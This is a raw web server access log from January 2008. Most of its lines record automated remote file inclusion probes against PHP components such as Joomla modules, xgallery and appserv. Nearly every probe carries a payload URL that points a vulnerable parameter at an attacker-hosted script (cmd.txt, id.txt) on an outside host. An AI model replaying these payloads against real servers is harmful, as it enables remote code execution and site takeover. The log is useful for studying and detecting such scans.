70.87.139.98 - - [30/Jan/2008:12:24:58 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.244.14 - - [30/Jan/2008:12:25:05 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.0" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
63.247.133.76 - - [30/Jan/2008:12:25:05 -0800] "GET //skin/zero_vote/error.php?dir=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.244.14 - - [30/Jan/2008:12:25:05 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.0" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
210.14.110.31 - - [30/Jan/2008:12:25:07 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
210.14.110.31 - - [30/Jan/2008:12:25:08 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
66.7.194.105 - - [30/Jan/2008:12:25:56 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.bpec-english.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
74.6.23.203 - - [30/Jan/2008:12:26:09 -0800] "GET /bikes/dteel/ HTTP/1.0" 200 8806 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.45.176.234 - - [30/Jan/2008:12:26:10 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
207.45.176.234 - - [30/Jan/2008:12:26:10 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
72.30.216.103 - - [30/Jan/2008:12:26:13 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.194.149.12 - - [30/Jan/2008:12:26:14 -0800] "GET /logs/access.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [30/Jan/2008:12:26:14 -0800] "GET /logs/access.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [30/Jan/2008:12:26:14 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [30/Jan/2008:12:26:15 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [30/Jan/2008:12:26:15 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [30/Jan/2008:12:26:15 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.26.137.64 - - [30/Jan/2008:12:26:19 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [30/Jan/2008:12:26:19 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [30/Jan/2008:12:26:20 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.167.33 - - [30/Jan/2008:12:26:21 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.q8x.info/blog/wp-content/themes/pink-kupy-10/117.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
81.169.167.33 - - [30/Jan/2008:12:26:22 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.q8x.info/blog/wp-content/themes/pink-kupy-10/117.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
58.26.137.64 - - [30/Jan/2008:12:26:27 -0800] "GET /logs/access_071229.log/index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [30/Jan/2008:12:26:27 -0800] "GET /index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
207.157.58.25 - - [30/Jan/2008:12:26:27 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
58.26.137.64 - - [30/Jan/2008:12:26:28 -0800] "GET /logs/index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.45.242.50 - - [30/Jan/2008:12:26:30 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
66.45.242.50 - - [30/Jan/2008:12:26:31 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
207.157.58.25 - - [30/Jan/2008:12:26:32 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
72.55.164.178 - - [30/Jan/2008:12:27:08 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gamezspace.net/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
72.55.164.178 - - [30/Jan/2008:12:27:08 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gamezspace.net/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
220.128.148.83 - - [30/Jan/2008:12:29:01 -0800] "GET /logs/access_080106.log///?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.128.148.83 - - [30/Jan/2008:12:29:06 -0800] "GET ///?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2963 "-" "libwww-perl/5.805" "www.dmulk.com"
220.128.148.83 - - [30/Jan/2008:12:29:11 -0800] "GET /logs///?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 33073 "-" "libwww-perl/5.805" "www.dmulk.com"
210.14.110.31 - - [30/Jan/2008:12:29:40 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
210.14.110.31 - - [30/Jan/2008:12:29:40 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
66.45.242.50 - - [30/Jan/2008:12:29:48 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
66.45.242.50 - - [30/Jan/2008:12:29:48 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
209.216.205.192 - - [30/Jan/2008:12:29:51 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
209.216.205.192 - - [30/Jan/2008:12:29:52 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
207.157.58.25 - - [30/Jan/2008:12:30:00 -0800] "GET /~webmaster/zboard//include/write.php?dir=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
207.157.58.25 - - [30/Jan/2008:12:30:00 -0800] "GET /logs/~webmaster/zboard//include/write.php?dir=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
64.38.34.10 - - [30/Jan/2008:12:30:11 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.38.34.10 - - [30/Jan/2008:12:30:11 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:30:20 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:30:20 -0800] "GET //appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:30:20 -0800] "GET /logs//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:30:24 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:30:24 -0800] "GET //appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:30:25 -0800] "GET /logs//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.45.176.234 - - [30/Jan/2008:12:30:39 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
207.45.176.234 - - [30/Jan/2008:12:30:39 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:30:41 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:30:42 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:31:00 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:31:00 -0800] "GET //appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:31:00 -0800] "GET /logs//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:31:16 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:31:45 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:31:45 -0800] "GET //appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:31:45 -0800] "GET /logs//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.100.219.165 - - [30/Jan/2008:12:31:50 -0800] "GET /logs/access_080106.log//modules/xfsection/modify.php?dir_module=http://thesoutherngospelshow.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [30/Jan/2008:12:31:50 -0800] "GET //modules/xfsection/modify.php?dir_module=http://thesoutherngospelshow.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [30/Jan/2008:12:31:51 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://thesoutherngospelshow.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.26.137.64 - - [30/Jan/2008:12:32:05 -0800] "GET /logs/access_071229.log/index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [30/Jan/2008:12:32:06 -0800] "GET /index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [30/Jan/2008:12:32:06 -0800] "GET /logs/index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
202.100.219.165 - - [30/Jan/2008:12:32:06 -0800] "GET /logs/access_071228.log//modules/xfsection/modify.php?dir_module=http://thesoutherngospelshow.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:32:11 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:32:47 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:32:47 -0800] "GET //appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:32:47 -0800] "GET /logs//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:32:57 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:32:58 -0800] "GET //appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:32:58 -0800] "GET /logs//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:33:02 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.14.110.31 - - [30/Jan/2008:12:33:19 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
210.14.110.31 - - [30/Jan/2008:12:33:20 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:33:21 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.205.192 - - [30/Jan/2008:12:34:07 -0800] "GET /logs/~webmaster/zboard//include/write.php?dir=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
209.216.205.192 - - [30/Jan/2008:12:34:22 -0800] "GET /~webmaster/zboard//include/write.php?dir=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:34:22 -0800] "GET //appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:34:22 -0800] "GET /logs//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:34:22 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:34:28 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:34:28 -0800] "GET //appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:34:28 -0800] "GET /logs//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:34:42 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:34:44 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.208.120 - - [30/Jan/2008:12:34:50 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:35:06 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:35:06 -0800] "GET //appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:35:07 -0800] "GET /logs//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:35:07 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:35:07 -0800] "GET //appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:35:07 -0800] "GET /logs//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.142.220.82 - - [30/Jan/2008:12:35:20 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [30/Jan/2008:12:35:21 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [30/Jan/2008:12:35:22 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:35:27 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:35:28 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.208.120 - - [30/Jan/2008:12:36:51 -0800] "GET /logs/access_071218.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [30/Jan/2008:12:36:51 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [30/Jan/2008:12:36:52 -0800] "GET /logs/access_080101.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.212 - - [30/Jan/2008:12:37:13 -0800] "GET /?N=D HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.242.208.120 - - [30/Jan/2008:12:37:24 -0800] "GET /logs/access_071216.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [30/Jan/2008:12:37:49 -0800] "GET /logs/access_071219.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [30/Jan/2008:12:38:03 -0800] "GET /logs/access_071220.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
150.161.5.91 - - [30/Jan/2008:12:38:23 -0800] "GET /logs/access.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [30/Jan/2008:12:38:23 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [30/Jan/2008:12:38:24 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.242.208.120 - - [30/Jan/2008:12:38:27 -0800] "GET /logs/access_071222.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [30/Jan/2008:12:39:04 -0800] "GET /logs/access_071214.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.97.20.22 - - [30/Jan/2008:12:39:12 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [30/Jan/2008:12:39:12 -0800] "GET /index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
